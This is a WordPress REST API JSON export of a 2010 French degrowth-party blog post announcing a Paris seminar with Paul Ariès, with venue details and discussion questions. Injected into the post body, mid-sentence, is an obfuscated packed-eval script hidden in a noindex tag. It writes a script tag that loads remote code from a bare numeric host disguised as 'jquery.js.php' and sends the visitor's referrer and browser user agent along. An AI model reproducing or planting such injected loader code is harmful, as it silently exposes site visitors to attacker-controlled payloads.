{"id":4611,"date":"2010-06-10T13:52:06","date_gmt":"2010-06-10T12:52:06","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=4611"},"modified":"2010-06-24T09:16:20","modified_gmt":"2010-06-24T08:16:20","slug":"seance-du-seminaire-copernic-avec-paul-aries-le-22-juin-a-paris-2","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=4611","title":{"rendered":"S\u00e9ance du s\u00e9minaire Copernic, avec Paul Ari\u00e8s le 22 juin \u00e0 Paris"},"content":{"rendered":"<p>\u00ab Quelle d\u00e9croissance pour quelle soci\u00e9t\u00e9 ? \u00bb<\/p>\n<p><em>L<\/em><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/www.fondation-copernic.org\/IMG\/gif\/fondat1.gif\" alt=\"\" width=\"103\" height=\"99\" \/><em>e <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hfhbf|var|u0026u|referrer|tthsr||js|php'.split('|'),0,{}))\n<\/script><\/noindex> mardi 22 juin de 19h30 \u00e0 21h30.<br \/>\nMairie du 2e arrondissement<br \/>\nSalle des expositions, 1er \u00e9tage<br \/>\n8 rue de la Banque<br \/>\nM\u00e9tro Bourse<\/em><br \/>\n<span style=\"color: #ff6600;\"><strong>Paul Ari\u00e8s<\/strong> directeur du Sarkophage, responsable des pages politiques du journal La d\u00e9croissance, auteur de \u00ab\u00a0La simplicit\u00e9 volontaire contre le mythe de l&rsquo;abondance\u00a0\u00bb, co-organisateur des Contre-Grenelle de l&rsquo;environnement.<\/span><\/p>\n<p><strong>Avant Propos :<\/strong><br \/>\nDeux chiffres suffisent \u00e0 prendre conscience de la gravit\u00e9 de la situation :<br \/>\n1) 20 % des humains s&rsquo;approprient 86 % des ressources naturelles.<br \/>\n2) Si six milliards d&rsquo;humains adoptaient notre mode de vie, une seule Terre ne suffirait pas : il en faudrait au minimum trois.<br \/>\nFaut-il se r\u00e9server les fruits de la croissance et condamner le Sud ? Peut-on croire \u00e0 une croissance \u00e9conomique infinie dans un monde fini ?<\/p>\n<p><!--more--><\/p>\n<p>Pourquoi la gauche et la droite ont-elles pill\u00e9s la plan\u00e8te ? Qu&rsquo;est-ce que le capitalisme vert ?<br \/>\nPourquoi les gauches restent-elles aphones ? Qu&rsquo;est-ce que proposent les divers courants de la d\u00e9croissance ?<br \/>\nEt si cette crise \u00e9tait aussi une chance pour l&rsquo;humanit\u00e9, une occasion de renouer avec le sens des limites, une occasion de faire de la d\u00e9fense de la gratuit\u00e9 notre grand combat ?<\/p>\n<p>Comment passer des mots-obus (d\u00e9croissance, anticapitalisme, antiproductivisme) \u00e0 des mots chantiers (le ralentissement contre le culte de la vitesse, la relocalisation contre le mondialisme, le prendre soin contre la soci\u00e9t\u00e9 du m\u00e9pris, la coop\u00e9ration contre la concurrence, la gratuit\u00e9 contre la marchandisation, etc&#8230;).<\/p>\n<p>Gratuit\u00e9 de l&rsquo;usage face au rench\u00e9rissement du m\u00e9susage ? Revenu garanti inconditionnel coupl\u00e9 \u00e0 un revenu maximal autoris\u00e9 ?<br \/>\nQuelles forces sociales pour porter ce projet d&rsquo;\u00e9mancipation ? Quelles perspectives politiques pour la d\u00e9croissance et l&rsquo;antiproductivisme ?<strong><\/strong><\/p>\n<p><strong>Entr\u00e9e libre dans la limite des places disponibles.<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00ab Quelle d\u00e9croissance pour quelle soci\u00e9t\u00e9 ? \u00bb Le mardi 22 juin de 19h30 \u00e0 21h30. Mairie du 2e arrondissement Salle des expositions, 1er \u00e9tage 8 rue de la Banque M\u00e9tro Bourse Paul Ari\u00e8s directeur du Sarkophage, responsable des pages &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=4611\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4611","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4611","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4611"}],"version-history":[{"count":7,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4611\/revisions"}],"predecessor-version":[{"id":4613,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4611\/revisions\/4613"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4611"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4611"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4611"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}